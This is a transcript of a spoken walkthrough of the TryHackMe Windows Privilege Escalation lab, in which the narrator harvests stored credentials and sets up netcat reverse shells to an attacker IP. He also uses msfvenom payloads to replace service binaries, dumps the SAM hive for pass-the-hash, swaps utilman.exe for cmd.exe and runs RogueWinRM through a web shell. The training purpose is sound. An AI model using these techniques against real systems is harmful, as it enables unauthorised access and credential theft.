Hey everybody, welcome back to my channel. This is WireDogSec and I'm back with another video for you guys. In today's video, we are going to continue on inside of TryHackMe with the Junior Penetration Tester learning path. This is the Privilege Escalation module. In the room is Windows Privilege Escalation. Learn the fundamentals of Windows Privilege Escalation techniques. Now let's go ahead and dive into it. Task 1, Introduction. During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target. This room covers fundamental techniques that attackers can use to evaluate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account where possible. If you want to brush up on your skills first, you can have a look through the Windows Fundamentals module or the Hacking Windows module. So be sure to check out both of those if you are unfamiliar. We're going to continue on with task number 2 here, Windows Privilege Escalation. Now let's see what they have for us. Simply put, privilege escalation consists of using given access to host with user A and leveraging it to gain access to user B by abusing a weakness in the target system. While we will usually want user B to have administrative rights, there might be situations where we'll need to escalate into other unprivileged accounts before actually getting administrative privileges. Gaining access to different accounts can be as simple as finding credentials in text files or spreadsheets left unsecured by some careless user, but that won't allow or always be the case. Depending on the situation, we might need to abuse some of the following weaknesses: misconfigurations on Windows services or scheduled tasks, excessive privileges assigned to our account, vulnerable software, missing Windows security patches. Before jumping into the actual techniques, let's look at the different account types on a Windows system. Now, just to go back and reference this, credentials in text files or spreadsheets left unsecured. Now, that still happens in the modern day world. In 2024, you'll probably come across some environment out there that has credentials in a text file, a Word document, a OneNote file, somewhere on SharePoint, right? Let's say your company has a SharePoint site, and you just go in and just do a query on password. Maybe you'll find some documents that have some kind of password in it. A lot of times it's passwords that are like generically based, or maybe it was for some kind of service account from years ago that's no longer used, and they just forgot to change the password on whatever account that belonged to. And hey, if I come across that in the pen test, I might just use that password and then conduct a password spray attack to see if I have any success with it. All right, so be sure to check those files and such. Even in emails, people have passwords in those, and they don't change the password, so just be aware of that. Anyways, continue on. Windows users. Windows systems mainly have two kinds of users, depending on their access levels. We can categorize a user in one of the following groups: administrators. These users have the most privileges. They can change any system configuration parameter and access any file in the system. Standard users. These users can access the computer, but only perform limited tasks. Typically, these users cannot make permanent or essential changes to the system and are limited to their files. Any system, or any user with administrative privileges will be part of the administrators group. On the other hand, standard users are part of the users group. In addition to that, you will usually hear about some special built-in accounts used by the operating system in the context of privilege escalation. System/local system. An account used by the operating system to perform an internal task. It has full access to all files and resources available on the host with even higher privileges than administrators. Local service. Default account used to run Windows services with minimum privileges. It will use anonymous connections over the network servers. Default account used to run Windows services with minimum privileges. It will use the computer credentials to authenticate through the network. These accounts are created and managed by Windows, and you won't be able to use them as other regular accounts. Still, in some situations, you may gain their privileges due to exploiting specific services. Answer the questions. All right, well, let's go ahead and just take a look at them. Users that can change system configurations are part of which group? Well, that's administrators, as stated up above. You got administrators, right? And you got standard users. The system account has more privileges than the administrator user. I or nay? Well, it's going to be I. If you take a look at this here, this is just used by the operating system to perform an internal task, has full access to all files and resources available on the host with even higher privileges than administrators. All right, task number 3 here. I've already started the machine here, so let's go ahead and take a look at it here. Harvesting passwords from unusual spots. The easiest way to gain access to another user is to gain credentials from a compromised machine. Such credentials could exist for many reasons, including a careless user leaving them around in plain text files or even stored by some software like browsers or email clients. Whoops, I went too far. Let me go back in here real quick. This task will present some known places to look for passwords on a Windows system before going into the task. Remember to click the Start Machine button, we've already done. You will be using the same machine throughout task 3 to 5. If you're using attack boxes, also a good moment to start it as you will be needing it in the following task. Okay, I've already started both of those. In case you prefer connecting to the target machine via RDP, you can use the following credentials listed out here. Unattended Windows installations. When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction. Such installations require the use of an administrative account to perform the initial setup, which might end up being stored in the machine in the following locations here, and have them listed out here. You got C unattended, C Windows Panther unattended, Windows Panther unattended, unattended, etc., etc. As part of these files, you might encounter credentials. So if you're looking at these XML files, right, and this is what it would look something like this, right? So let's go ahead and continue on to PowerShell history. Whenever a user runs a command using PowerShell, it gets stored into a file that keeps a memory of past commands. This is useful for repeating commands you have used before quickly. If a user runs a command that includes a password directly as part of the PowerShell command line, it can later be retrieved by using the following command from a command.exe prompt. And this is what it looks like here. They use type and they are looking at this console_history.txt file. The command above will only work from cmd.exe as PowerShell won't recognize percentage sign user profile percentage sign as an environment variable. To read the file from PowerShell, you have to replace that placeholder with this env:/user profile. Saved Windows credentials. Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials, so use cmd key and then /list. While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with run as command and the /save cred option as seen below, and that's what it looks like here. They're trying to use this admin user and then use those saved credentials. IIS configuration, Internet Information Services, aka IIS, is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configure authentication mechanisms depending on the installed version of IIS. We can find web.config in one of the locations here. C inetpub www root, and then you got web.config. Then here's the other location here. C Windows Microsoft.net framework, yada yada yada. Here is a quick way to find database connection strings on the file. They use type and then the following path here, and they pipe that into find string command, and then connection string is what they're looking for there. Retrieve credentials from software such as PuTTY. PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user, and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include clear text authentication credentials. To retrieve the stored proxy credentials, you can search under the following registry key for proxy password with the following command. Right, they did reg query, and then they are querying this particular registry location here. Note, Simon Tatham is the creator of PuTTY, and his name is part of the path, not the username for which we are retrieving the password. The stored proxy Username should also be visible after running the command above. Just as PuTTY stores credentials, any software that stores passwords, including browsers, email clients, FTP clients, SSH clients, VNC software, and others, will have methods to recover any passwords used or passwords the user has saved. All right, answer and question time. Now, pause the video and try to answer these questions yourself and come back to the video for the walkthrough and solutions. Let's take a look at this first question. A password for the Julia.Jones user has been left on the PowerShell history. What is the password? Well, as we read above on how to discover passwords from history, you can do it this way by using the type command and then locating the following directory and looking at the console_history file. So let's go ahead and do that here and see what it brings up. All right, and there we go. User Julia.Jones and pass is this one here. You can also just navigate straight to these directories as well in these files, right? And File Explorer. We'll get there in a second. The second one says a web server is running on the remote host. Find any interesting password on web.config files located with IIS. What is the password of db underscore admin user? Well, let's go ahead and take a look. Now remember, you can locate this web.config files in multiple um, directories here, right? You got two of them, two possible directories here. You can also use this long command and options here to do that. So first, let me clear all this out, and then let's see here. All right, so I had opened this one up manually, right, in a file explorer. So I just basically copy and pasted this location here, and then opened up this web.config file inside of Notepad. Did a Control F for find, and then typed in connection string, and you can see the information down here at the bottom, right? ID equals db underscore admin, and then there's the password right there. So there you go. You can do it multiple ways to get this password. All right, next one says there's a saved password on your Windows credentials using CMD key and run ask spawn a shell for Mike.cat and retrieve the flag from his desktop. Remember, we can use this here, run as, and then / save cred, and then the user is going to be Mike.cat and then CMD to open up a new shell using his credentials here. There we go. And if we do who am I, there we go. Now we're logged in as Mike.cat. And if we do a CD into his desktop area, users, and then CD into Mike, and it's probably going to be in the desktop. Do a dir, and there's the flag right there. So let's go ahead and clear all this out and do type and then flag txt. So there's the answer for that one. And his last one says retrieve the saved password stored in the saved PuTTY session under your profile. What is its what is the password for the tom.smith user? And to get that one, you can do this reg query here, right? So I'm going to copy and paste this over like so, if it lets me. Let's try it this way. There we go. All right, there's an error. Okay, well, I'm logged in as Mike, so let's get out of that and try it here. There we go. And tom.smith, and the password's cool pass 2021. Let's go ahead and continue on to task number 4 here. And we're going to talk about other quick wins. Privilege escalation is not always a challenge. Some misconfigurations can allow you to obtain higher privileged user access and, in some cases, even administrator access. It would help if you considered these to belong more to the realm of CTF events rather than scenarios you will encounter during role penetration test engagements. However, if none of the previously mentioned methods works, you can always go back to these. Scheduled task. Look into scheduled task on the target system. You may see a scheduled task that either lost its binary or it's using a binary you can modify. Scheduled task can be listed from the command line using the schedule or SCH task command without any options. To retrieve detailed information about any of the services, you can use a command like the following one here, and have SCH task query tn voltask fo list v. to get that particular information. So you will get lots of information about the task, but what matters for us is the task to run parameter, which indicates what gets executed by the scheduled task, and the run as user parameter, which shows the user that will be used to execute the task. If our current user can modify or overwrite the task to run executable, we can control what gets executed by task user 1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, use iCalcs or iCackles, right? Or iCackles, however you pronounce that. But anyway, and that's what it looks like here. Probably iCackles. Anyway, as can be seen in the result, the built-in users group has full access, which is F over the task binary. This means we can modify the .bat file and insert any payload we like. For convenience, nc64.exe can be found on C tools. Let's change the bat file to spawn a reverse shell, and that's what it looks like here. Echo C tools nc64-e command attacker IP address, etc., etc. We can then start a listener on the attacker machine on the same port we indicated on our reverse shell, netcat or nc-lvp 4444. The next time that the scheduled task runs, you should receive the reverse shell with the task user 1 privileges. While you probably wouldn't be able to start the task in a real scenario and would have to wait for the scheduled task to trigger, we have provided your user with permissions to start the task manually to save you time. We can run the task with the following command. That's what it looks like here, and you will receive the reverse shell with task user 1 privileges as expected, and that's what it looks like here. Connect it back to the listener. Now you're running as that person or that user. Go to task user 1 desktop to retrieve a flag. Don't forget to input the flag at the end of this task. Um, Always install elevated. All right, so first let's take a look at this flag, and then we'll read on about this one here. Okay, let's step through this. As you can see here, I did the SCH task command here, and you can see it's listed out all of them here, but the one in particular we want to take a look at is going to be this full task here. So let's go ahead and do a copy and paste like so. Clear all this stuff out, paste this in there, and we can see all kinds of information about that particular task. All right. Now, the next step is you can take a look at the iCackles, right, of this particular file here. So let's go ahead and copy and paste this over and clear all this stuff out. There we go. Next thing is to go to this tools directory here and then locate this file like so, and then try to run it. Or actually, you're going to echo all this stuff into that particular .bat file, right? And then whenever the scheduled task runs, it's going to launch this back to our listener. So let's go ahead and echo this in for now. Don't press enter yet. Let's flip back over to attack box and be sure to start up a netcat listener, as you can see there, right? And my attacker IP is 10.10.4.182. So let's go ahead and flip back over to the Windows machine here. All right, and I'm gonna go in and replace this IP address with my attacker machine IP address. All right, now that's done. And since we already have permissions to run this task, we don't have to wait. So I'm gonna go ahead and run it like that. Okay, now I'll flip back over to the attack box and it should have worked. All right, looks like it did. So let's do a who am I. Yep, host name, the usual stuff here. There we go. Now we need to go and locate the flag. It's on this user's desktop here. So let's go ahead and cd into that. cdc, c. And there's the flag. So let's do type and then flag.txt. There we go. There's the flag for this one. Okay, now let's go back up and talk about this always install elevated. Windows installer files, also known as .msi files, are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account, even unprivileged ones. This could potentially allow us to generate a malicious MSI file that would run with admin privileges. Note, the always install elevated method won't work on this room's machine, and it's included as information only. Okay, this method requires two registry values to be set. You can query these from the command line, use the following commands here, reg query, and this following um, registry area, right? It says to be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be possible. If these are set, you can generate a malicious.msi file using MSF Venom as seen below, and that's what it looks like here. As this is a reverse shell, you should also run the Metasploit handler module to configure accordingly. Once you have transferred the file you have created, you can run the installer with the command below and receive the reverse shell. So you can try this out on a machine, or maybe just take note of it, and maybe this could be something on a CTF that you can use. Task number 5, we're going to talk about abusing service misconfigurations. So let's see what they have for us here. Windows services. Windows services are managed by the Service Control Manager, SCM. The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service, and generally providing a way to configure services. Each service on a Windows machine will have an associated executable which will be run by the SCM whenever a service is started. It is important to note that the service executables implement special functions to be able to communicate with SCM, and therefore not any executable can be started as a service successfully. Each service also specifies the user account under which the service will run. To better understand the structure of a service, let's check the app host SVC service configuration with the following command, scqc command. All right, so let's go ahead and do that. Let's flip back over to this window box, and I'm going to copy and paste. Let's go ahead and clear all this stuff out. There we go. Here we can see that the associated executable is specified through the binary path name parameter, and the account used to run the service is shown as the service start name parameter. Services have a discretionary access control list, a DACL, which indicates who has permission to start, stop, pause, query status, query configuration, or reconfigure the service, amongst other privileges. The DACL can be seen from Process Hacker, available on your machine's desktop. Hey everybody, just a quick little blurb here. As you can see here, most people that view my channel are not subscribers. If you're new here, please consider subscribing to the channel. If you're enjoying the video, please consider hitting the like button. It helps get me in the algorithm, helps spread the good word out there, helps bring more people and increase our glorious community here. All right, I'm all about helping out others. I know what it's like to come up in cybersecurity or even try to get into cybersecurity and not knowing where to look. I'm just having this channel up so I can help out other people. All right, that's all I got. Okay, this is what Process Hacker looks like. So you can go in, take a look at everything that's running. You go up here and search for things as such. So I'm going to minimize this for now. And the next one is going to talk about looking inside of registry editor, which I have pulled up here, and I have this location pulled up there. As you can see there, a subkey exists for every service in the system. Again, we can see the associated executable on the image path value and the account used to start the service on the object name value. If a DACL has been configured for the service, it will be stored in a subkey called security. As you have guessed by now, only administrators can modify such registry entries by default. Insecure permissions on service executable. If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially. To understand how this works, let's look at a vulnerability found on Splinterware System Scheduler. To start, we will query the service configuration using SC. So I'm let's go ahead and try this out and see if they want us to follow along here. All right, so I'm gonna go ahead and clear all this stuff out and then paste that in there, and there we go. It says we can see that the service installed by the vulnerable software runs as svc user1, and the executable associated with the service is in the following directory here. We then proceed to check the permissions on the executable. We can do that with IC ACLs, right? So let's go ahead and copy and paste that over. All right, and here we have something interesting. The everyone group has modified permissions, which is M, on the service's executable. This means we can simply override it with any payload of our preference, and the service will execute it with the privileges of the configured user account. Let's generate an XE service payload using MSF Venom and serve it through a Python web server. So, all right, let's go ahead and do that. All right, so flip back over to the attacker box. All right, now we're in the attacker box. Go ahead and clear all this stuff out. Oh, let me exit out of this first. Now let's clear everything out. And we're going to use MS Venom to generate this particular um, file here. So let's go ahead and fix these placeholders, right, with the IP address of my attacking box, which is going to be 10.10.4.182, and the port's going to be 4445. Okay, everything looks good, so let's go ahead and run this. And then we're going to set up a Python HTTP server. So I'm going to go ahead and copy this. Now, as soon as this finishes running, we can drag this over to the victim machine, which is that Windows box. All right, so it finished generating that particular file. I started up the HTTP server with Python, so flip back over to the victim machine, and I use a wget to pull that file down onto the victim machine. As you can see here, now the file is there. And let's go ahead and continue on. Once the payload is set in the Windows server, we proceed to replace the server's executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to everyone group as well. And we can do that by doing this. So let's go ahead and just copy and paste this stuff over. All right, so I'm gonna flip back over to just a regular command prompt. Call this stuff out. Okay. And I want to move this to here. All right. The next one. And then next one. All right, looks good. We start a reverse listener on the attacker machine. So let's go ahead and flip back over and let's go ahead and kill this. We don't need this anymore. So I'm going to just up arrow. All right, and then 5, like so. It says, and finally, restart the service. While in a normal scenario, we would likely have to wait for a service restart. You have been assigned privileges to restart the service yourself to save you some time. Use the following commands from the command line, command prompt. So let's go ahead and do that. Copy and paste as usual. All right. So let's take a look here. Let me get rid of this and paste this over. Whoops. Okay. This says it does not exist. I deleted too much, of course. Let me try this again. There. All right, so it stopped. Let's clear this out, and then I'm going to start it up now. All right, and okay, I keep double pasting for some reason. All right, there we go. Now let's flip back over to the attacker box. It should have connected back, and it sure did. So who am I? All right, and it says PowerShell has SC as an alias to set content. Therefore, you need to use sc.exe in order to control services with PowerShell this way. As a result, you'll get a reverse shell with the same privileges, right? As we saw there, we did who am I. Go to the desktop, retrieve the flag. Don't forget to input the flag in this task. So let's go ahead and do that. So cd to c, and then users. All right. Oops. All right. So we're going to cd into svc user1. right? Okay, then cd into desktop, like so. Do a dir on it, and there we go. There's the flag, so flag.txt. And let's go ahead and plug this in as one of the answers. All right. And we need to get the second one here. So let's go back up to where we stopped. Okay. All right. Unquoted service paths. When we can't directly write into service executables as before, there might still be a chance to force a service into running arbitrary executables by using a rather obscure feature. When working with Windows services, a particular behavior occurs when the service is configured to point to an unquoted executable. By unquoted, we mean that the path of the associated executable isn't properly quoted to account for spaces on the command. As an example, let's look at the difference between two services. These services are used as examples only. It might and might not be available in your machine. The first service will use a proper quotation so that the SCM knows without a doubt that it has to execute the binary file pointed by C program files, real VNC, VNC server, VNC server.exe, followed by the given parameters, and that's what it looks like here. Remember, PowerShell has SC as an alias to set content. Therefore, you need to use sc.exe to control your services if you're in a PowerShell prompt. Now let's look at another service without proper quotations, and this is what it looks like here. All right. When the SCM tries to execute the associated binary, a problem arises. Since there are spaces on the name of the disk sorter enterprise folder, the command becomes ambiguous, and the SCM doesn't know which of the following you're trying to execute. And an example of what they're talking about is here. All right, so there's a command disk.exe sorter enterprise bin disk blah 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 disk space sorter.exe, and that's what it looks like here, bin disk scr.exe, and then etc etc. This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of quoted string. This means the right interpretation of the unquoted command would be to execute the following, as it looks like here, and to take the rest as arguments. Instead of failing, as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order of shown in the table. First, search for C my folder or my program's disk exe. If it exists, service will run this executable. 2, if the latter doesn't exist, it will search for the following here. If it exists, the service will run this executable. 3, if the latter doesn't exist, then it will search for the following. This option is expected to succeed and will typically be run a default installation. From the behavior, the program becomes evident or sorry, the problem becomes evident if an attacker creates any of the executables that are searched for before the expected service executable. They can force the service to run an arbitrary executable. While this sounds trivial, most of the service executables will be installed under the C program files or C program files x86 by default, which isn't writable by unprivileged users. This prevents any vulnerable service from being exploited. There are exceptions to this rule. Some installers change the permissions on the installed folders, making the services vulnerable. An administrator might decide to install the service binaries in a non-default path. If such a path is world writable, the vulnerability can be exploited. In our case, the administrator installed the disk order binaries under C my programs by default. This inherits the permission of C um, backslash directory, which allows any user to create files and folders in it. We can check this by using the IC ACLs. So if we go ahead and let's just go ahead and copy and paste this over. Let's go ahead and flip back to the machine here. All right, so let's go ahead and clear all this stuff out. And then let's go ahead and paste this, copy and paste this over. There we go. It says the built-in users group has AD and WD privileges, allowing the user to create subdirectories and files respectively. The process of creating an XE service payload with MSF Venom, and transferring it to the target host is the same as before. So feel free to create the following payload and upload it to the server as before. We will also start a listener to receive the reverse shell when it gets executed. So let's go ahead and do that. All right. And as usual, I'm going to copy and paste this stuff over. Okay, let me go ahead and exit out of this. I don't think we'll need this anymore. Okay, so let's go ahead and clear this stuff out. And go ahead and paste this over and fix the placeholders. So change this attacker IP to my attacker box IP address. .4.182. Okay, it looks good. And then as soon as this gets done being created, we're going to start up a netcat listener again. Okay, I've already got the payload downloaded to the victim machine. As you can see there, I already moved it over. Now all I need to do is stop and restart the service. So let's go ahead and do that using this here to stop it. Okay. And then we're going to start it up and should get a connection back to our attacking machine because I have already started up the netcat listener. So let's go ahead and flip back over. There we go. So let's do who am I? Awesome. So let's go ahead and do the same thing here. CD into C and then users. CD into SVC user 2 and then CD into desktop. Okay, do a dir and then type the flag file, get the contents. There we go. So go ahead and grab this real quick and we can plug it in to the next one like so. And the next one, we're going to have to get the administrator's flag apparently. So let's go ahead and scroll back up. I'm going to talk about insecure service permissions. You might still have a slight chance of taking advantage of a service if the service's executable DACL is well configured and the service's binary path is rightly quoted. Should the service DACL, not the service's executable DACL, allow you to modify the configuration of a service, you will be able to reconfigure the service. This will allow you to point to any executable you need and run it with any account you prefer, including system itself. To check for a service DACL from the command line, you can use access check from sysinternal suite. For your convenience, a copy is available in the C tools area. The command to check for the THM service is or DACL is the following here. So let's go ahead and just copy and paste here. Okay, now as you see, we navigated to that particular directory. Now we're going to copy and paste this over like so. And there we go. Hit agree. All right. So you get a bunch of information there, service there. So here we can see that the built-in users group has the service all access permissions, which means any user can reconfigure the service. Before changing the service, let's build another exe service reverse shell and start a listener for it on the attacker's machine. And let's go ahead and do that here. MSF Venom. So go ahead and copy and then paste this over. As usual, we need to make certain modifications in there. So I'm going to do it up here. Oh, sorry. I need to exit out of this. I keep forgetting to do that. Now, clear all this stuff out and generate the payload. All right, now we're going to do the same thing here. Start up a netcat listener and then transfer the machine over. Do the IC again, and then do the following here. So let's go ahead and transfer it over, and then we'll come back to this area here. Okay, I've already done the IC command here. Now I'm on this next one down here. So I'm going to copy and paste this over like so. There we go, we changed it. Just notice we can use any account to run the service. We can choose local system as it is the highest privilege account available. To trigger our payload, do the following here. So let's go ahead and do that here. Copy and paste this over. All right. This has not been started. Well, okay, let's try this here then. Okay. It says, and we will receive a shell back. So let's go ahead and check our attacker box. I forgot to start it up. Darn it. Let's do that right now. So start up your Netcat listener, okay? Don't forget to do that. Now let's flip back over and try it again. All right. So we're gonna stop it. Stop and start it. Okay. Well, let's try to start it then. All right. There we go. So if we do a who am I? All right. There we go. We are NT authority system. Now we need to get the flag off the administrator's desktop. All right. So let's go ahead and CD into C, then users, CD into, I guess, administrators. Okay. And then it's going to be on the desktop, I'm sure. Yep. So you into the desktop, do a dirt on that, and then let's type this last flag here, txt, and there's the last flag we need to get. Awesome. All right, so let's go ahead and kill this target machine here, and then we're going to continue on to task number 6 here, and we're going to talk about abusing dangerous privileges. So let's go ahead and start this up while that's loading. Let's talk about Windows privileges. Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls. Each user has a set of assigned privileges that can be checked with the following command here. All right, so let's go ahead and flip. Let's exit out of this first. Okay, I keep forgetting to do that. Now, as soon as this finishes loading, we can try this out real quick. But let's go ahead and continue on. A complete list of available privileges on Windows system is available here, so check that out if you're interested. From an attacker standpoint, only those privileges that allow us to escalate in the system are of interest. You can find a comprehensive list of exploitable privileges on the priv2admin GitHub project. While we won't take a look at each of them, we will showcase how to abuse some of the most common privileges you can find. And let's talk about SE backup slash SE restore. All right, it says log into the target machine, RDP, blah, blah, blah. The SE backup and SE restore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind the privilege is to allow certain users to perform backups from a system without requiring full administrative privileges. However, or sorry, having this power, an attacker can trivially escalate privileges on the system by using many techniques. The one we will look at consists of copying SAM and system registry hives to extract the local administrator's password hash. All right, so let's go ahead and RDP into this, repeat into the victim machine here, and I am opening up this command prompt as administrator. So let's go ahead and do that. Who am I? / priv. Get the list out here. There we go. And it says to back up the SAM and system hashes, we can use the following commands here. And let's go ahead and do that here. Reg. I don't think this will let me copy and paste inside of here. So we have to type all this stuff out, unfortunately. System and then C users. All right, now let's see if this works. All right, awesome. So let's do this one here. All right, there we go. This will create a couple of files with the registry hives content. We can now copy these files to our attacker machine using SMB or any other available method. For SMB, we can use npackets smb server.py to start a simple SMB server with a network share in the current directory of our attack box. Okay, so let's go ahead and try that. Let me go ahead and minimize this here, minimize this, and let's do this. All right, cool. And let's go ahead and run this here. See if this works. Hopefully it does. This will create a share name public pointing to the shared directory, which requires the username and password of our current Windows session. After this, we can use the copy command in our Windows machine to transfer both files to our attacker box. And let's go ahead and try that here. Okay, so I need to do some placeholders, and I can't copy and paste through here, right? So let's clear all this out and type all this out. So copy, C. Okay, so back up and then do Sam Hive, and then let's do to the attacker machine. All right, public, and then let's try this. Awesome. Okay, now we need to do the system hive. Awesome. So it looks like it was successful. It says then usempacket to retrieve the user's password hashes. All right, so let's go back to this. Oh, awesome. I already did it. Cool. And let's see here. We can finally use the administrator's hash to perform a pass the hash attack and gain access to target machine with system privileges. All right, so let's see here. Let's go ahead and I guess kill this, right? Or do we need to leave this running? Let's kill this first and then try it. So let's go ahead and Control C out of this and try it this way. Let's do this first one here. Yeah, okay. Where did it's in share, right? So let's go ahead and CD into share and clear all this out. All right, now let's try this again. Awesome. Let's do this next one here. All right, so let's launch this one here with the hashes, and it looks like it was successful. So let's do a who am I anti-authority system. Awesome. And that's it for that one. It says SE take ownership. The SE take ownership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running a system and take ownership of the services executable for this task. We will be taking a different route, however. So log in using the following credentials here. Before that, let's scroll down to the bottom, make sure we're not missing any flag stuff here that we need to do. So let's see what they say. Okay, so let's see if we can just navigate to this particular directory first. So C, and let's do a dir. Oh, sorry. Let's do go to users first, and then do a dir. Okay. All right. So I doubt we can even get to this. Oh, or can we? Okay. Let's do this. CD into desktop. We should be able to get in there because we're not NC authority. So let's go ahead and or type this flag. All right. Look at that. Okay. So we already got the flag for this, but let's go back and just try these other methods real quick. So let's go ahead and continue where we left off about this SE take ownership, right? I'm already RDP'd in. I did the who am I /priv, as you can see there. It says we'll abuse the utilman.exe to escalate privileges this time. Utilman is a built-in Windows application used to provide ease of access options during the lock screen. It says since Utilman is run with system privileges, we will effectively gain system privileges if we replace the original binary for any payload we like. as we can take ownership of any file, replacing it is trivial. To replace Utilman, we will start by taking ownership of it using the following command here. So we'll go ahead and clear all this stuff out. Okay, and it looks like take own was successful. Let's continue on. Just notice that being the owner of a file doesn't necessarily mean that you have privileges over it, but being the owner, you can assign yourself any privileges you need to give your user full permissions over utilman.exe. You can use the following command here. So let's go ahead and copy and paste this IC information over. I forgot you can't do that, right? Because I can't copy and paste in this one. So let's just type all this out. ACLs and then C Windows System 32 C Utilman and then grant THM take ownership. If I could spell this correctly. ICACLS. There. Okay, looks like that completed successfully. And it says after this, we will replace the utilman.exe with a copy of cmd.exe. So let's go ahead and do that here. So copy cmd.exe to utilman. Okay, I need to first navigate to this directory and do it because it's been a long day. Making all kinds of errors today. Now let's do it. There. Let's do yes. Okay, now let's try it. Go and lock the machine. Okay, where's this option here? All right, let's do it this way. Lock it there. Okay, and finally, proceed to click on ease of use, which is this here, or ease of access button, which runs utilman with system privileges since we replaced it with CMD. All right, so who am I? Awesome. See. Next one here, we're going to talk about SE impersonate, SE assign primary token. These privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or a thread under the security context of another user. Impersonation is easily understood when you think about how an FTP server works. The FTP server must restrict users to only access the files that should be allowed to see. Let's assume we have an FTP service running with the user FTP without impersonation. If user An logs into the FTP server and tries to access their files, the FTP service will try to access them with its access tokens rather than An's. And here's what an infographic of what this looks like here. There are several reasons why using FTP's token is not the best idea. For the files to be served correctly, they would need to be accessible to the FTP user. In the example above, the FTP service would be able to access An's files, but not Bill's files, as the DACL in Bill's files doesn't allow user FTP. This adds complexity as we must manually configure specific permissions for each served file/directory. For operating system, all files are accessed by user FTP, independent of which user is currently logged into the FTP service. This makes it impossible to delegate the authorization to the operating system. Therefore, the FTP service must implement it. If the FTP service were compromised at some point, the attacker would immediately gain access to all the folders with the FTP's user has access. If, on the other hand, the FTP services user has the SE impersonate or SE assign primary token privilege, all of this is simplified a bit as the FTP service can temporarily grab the access token of the user logging in and use it to perform any task on their behalf. All right. Now, if user N logs into the FTP service, and given that the FTP user has impersonation privileges, it can borrow N's access token and use it to access files. This way, the files don't need to provide access to user FTP in any way, and the operating system handles authorization. Since the FTP service is impersonating N, it won't be able to access Jude's or Bill's files during that session. As attackers, we can, or if we manage to take control of a process with SC impersonate or SC assigned primary token privileges, we can impersonate any user connecting and authenticating to that process. And Windows systems, you find that the local service and network service accounts already have such privileges. Since these accounts are used to spawn services using restricted accounts, it makes sense to allow them to impersonate using or impersonate connecting users if the service needs. IIS will also create a similar default account called IIS app pool, default app pool for web applications. To elevate privileges using such accounts, an attacker needs the following. One, to spawn a process so that users can connect and authenticate to it for impersonation to occur. Two, find a way to force privileged users to connect and authenticate to spawn malicious processes. We will use rogue when our elm exploit to accomplish both conditions. Let's start by assuming we already have compromised a website running on IIS and that we have planted a web shell in the following address here. We can use the web shell to check for the assigned privileges of the compromised account and confirm we hold both privileges of interest in this task. So let's go ahead and I guess navigate to this. All right, so let's minimize this and open up Firefox. And let's see if we can see this. Okay, it's running a little slow today. There we go. So let's go ahead and go to this area here. Awesome. So let's go ahead and do who am I / priv and run. There we go. To use Rogue WinRM, we first need to upload the exploit to the target machine. For your convenience, it has already been done, and you can find the exploit C tools folder. The Rogue WinRM exploit is possible because whether a user, including unprivileged users, starts the bits service in Windows, it automatically creates a connection to port 5985 using system privileges. Port 5985 is typically used for the WinRM service, which is simply a port that exposes a PowerShell console to be used remotely through the network. Think of it like SSH, but using PowerShell. If for some reason the WinRM service isn't running on the victim server, an attacker can start a fake WinRM service on port 5985 and catch the authentication attempt made by the bit service when starting. If the attacker has SE and impersonate privileges, he can execute any command on behalf of the connecting user, which is system. Before running the exploit, we'll start a netcat listener to receive a reverse shell on our attacker's machine. So let's go ahead and do that here. And then use our web shell to trigger the rogue WinRM exploit using the following command here. So let's go ahead and do that. I'm going to copy and paste this over. Okay. And of course, we need to replace this placeholder with your attacker box IP address. All right. Otherwise, it's not going to work. All right. So looks good. Let's go ahead and run it. Click back over to netcat listener and see if it works. All right. Let's see here. Looks like it's taking a while. So I'm just double checking, make sure there's nothing weird going on here. Everything looks good so far. Uh, okay, the exploit may take up to 2 minutes to work, so your browser may appear as unresponsive for a bit. This happens if you run the exploit multiple times. As if you wait for the bit service to stop and before starting again, the bit service will stop automatically after 2 minutes at starting. The -p parameter specifies the executable to be run by the exploit, which is nc64.exe in this case. The -a parameter is used to pass arguments to the executable. Since we want NC64 to establish a reverse shell against our attacker machine, the arguments to pass to netcat will be -e cmd.exe and then attacker's IP 4.2. If all was correctly set up, you should expect a shell with system privileges, and it should look like that. Using any of the three methods discussed in the task, gain access to the administrator desktop, get the flag, which we've already done here. So if this finishes, we can take a look at it. If not, I'm just going to continue on to task number 7 here. Okay, it looks like it finally went through after about like 10 minutes or so. And this is what it looks like here. All right, so it was successful. Now we're going to continue on with task number 7. I've already started up this machine for task number 7. Let's go ahead and read through some of this here. Unpatched software. So let's flip back to this and see. It's going to take a bit to load up. Software installed on the target system can present various privilege escalation opportunities. As with drivers, organizations and users may not update them as often as they update the operating system. You can use WMIC tool to list software installed on the machine. On the target system and its versions. The command below will dump information it can gather on installed software. It might take around a minute to finish, so you can try this out to list out the software. Remember that WMIC or WMIC product command may not return all installed programs depending on how some of the programs were installed. They might not get listed here. It is always worth checking desktop shortcuts, available services, or generally any trace that indicates the existence of additional software that may be valuable. Once we have gathered product version information, we can always search for existing exploits on the installed software online on sites such as ExploitDB, PacketStorm, or plain old Google, amongst many others. Using WMIC and Google, can you find a known vulnerability on any installed product? As soon 